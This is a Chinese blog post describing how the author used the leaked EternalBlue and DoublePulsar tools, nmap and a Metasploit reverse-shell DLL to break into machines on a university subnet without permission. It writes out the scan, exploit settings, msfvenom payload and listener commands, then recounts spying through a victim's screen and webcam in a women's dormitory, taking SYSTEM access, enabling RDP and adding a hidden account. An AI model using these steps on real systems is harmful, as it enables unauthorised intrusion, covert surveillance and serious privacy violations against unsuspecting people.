Quantcast
Channel: 邪恶十六进制
Viewing all articles
Browse latest Browse all 10

利用方程式组织黑客工具包盲打Windows,误伤女寝

$
0
0

准备环境

kalilinux 监听机,或者装有msf和nmap的linux即可,桥接物理机网络

win03 攻击机 python2.6 + pywin32 环境 桥接

exp下载链接 https://github.com/misterch0c/shadowbroker

python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/

pywin32-221.win32-py2.6.exe
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/

靶机:不用本地的靶机,虽然测试成功了,但是要实战才有意思。所以扫本地的C段。


配置攻击机1【win2003】

把下载的exp压缩包中Windows目录解压到攻击机上,不要解压到有中文目录的路径,不然会报错,解压完后,我们在Windows目录下新建一个空目录“listeningposts”,为什么要建立这个目录,因为fb.py中有个遍历目录的参数,对应的就是这个目录,默认是没有的。

利用nmap扫下C段,看有哪些机器开了445端口,主要针对win4 64 的主机进行试验。

nmap -p 445 -O 10.20.70.0/24   
扫描整个C段开放445端口的主机,并且探测系统版本。

针对目标主机 10.20.70.x

然后运行fb.py脚本,设置参数

攻击目标

[?] Default Target IP Address [] : 10.20.70.x

本机IP
[?] Default Callback IP Address [] : 10.20.88.207

是否重定向
[?] Use Redirection [yes] : no

是否输出日志
[?] Base Log directory [D:\logs] : no

根据提示,新建一个项目,然后默认设置,直到设置
use eternalblue

设置好选择Yes,然后一路回车默认,直到出现选择针对的目标系统和加载的MODE

这里我都选择1,因为我针对的系统是X64的win7,MODE用本身自带的一个fuzz框架。然后一路YES回车,直到出现

输入 use doublepulsar

然后一样默认设置回车yes,直到出现要我们再次设置攻击目标的信息,选择SMB服务,x64系统,利用RunDLL模块。

到这里,配置这个exp已经差不多了,这时候打开kalilinux,利用msf配置一个DLL的后门,因为刚才我的fb.py利用的模块是RUNDLL。


配置攻击机2【kalilinux】

利用msf生成一个x64位的dll后门

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.20.89.101 LPORT=5555 -f dll > s.dll

然后msfconlse 打开msf

设置参数开启侦听


msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.20.89.101
lhost => 10.20.89.101
msf exploit(handler) > set lport 5555
lport => 5555
msf exploit(handler) > exploit

设置完kalilinux,把刚才生成的dll后门,放到win03攻击机1的C盘目录下。

然后在攻击机1下设置开始攻击。

这时候,kalilinux下反弹了一个shell回来,成功了,HELP一下,看看这个shell有什么功能

功能挺多,运行一下截图桌面的命令。
screenshot

原来在看爱奇艺

看到拍照功能,试验一下。
webcam_snap
竟然一不小心盲到了女寝的C段,学校的wif IP是随机分配的,好吧,我不是有意的,因为隐私问题固打码,看样子妹子也是一脸懵逼,估计摄像头的灯亮了下。:P

运行shell,获取一个system的权限,利用命令开3389,并且创建隐藏账户

功能还有很多,可以利用system权限远程下载一个远控等等,自己挖掘,这里就不继续演示了。排版可能有问题,凑合看吧!


总结

这个漏洞基本是通杀的,真的非常可怕,分析了下源码发现全是自带的库,无奈编程太菜,看了下网上的分析,发现这个漏洞也是基于堆栈的底层溢出,底层的东西我相信还有更多的漏洞没被挖掘出来,无法想象真正的黑客组织手里的0day有多可怕,也让我看到了差距有多大。

两个字总结:震撼!

注:图片本人已经删除了,虽然打了马赛克,但是对于别人造成的影响还是有的,如果在上面的文章中对其事件人物造成了影响,在这里说声抱歉,敬以歉意。
虽然是实战但是涉及到一些隐私问题,一张打了马赛克的照片,和关了爱奇艺,其他本人保证绝对没有做!希望其他论坛和网站转载了本篇文章的朋友请删除相应的内容,再次申明,其他论坛转载文章发生的法律关系与本人无任何关系!
我写这篇文章的目的不是为了教大家怎么去入侵,虽然标题有点扎眼:)
只是希望在安全问题这个方面,引起大家的重视。

对于这个漏洞的防御方法,我的建议是开启防火墙,做一个tcp连接的入站规则阻止,或者直接卸载掉445端口,

参考文章:http://www.jb51.net/hack/95788.html
http://mp.weixin.qq.com/s?__biz=MzIyNTA1NzAxOA==&mid=502990295&idx=1&sn=181c1e9b01854b87d3d4752c593c4dd4&chksm=700a2442477da

原文地址:http://fjhack.me/2017/04/16/08/


Viewing all articles
Browse latest Browse all 10

Trending Articles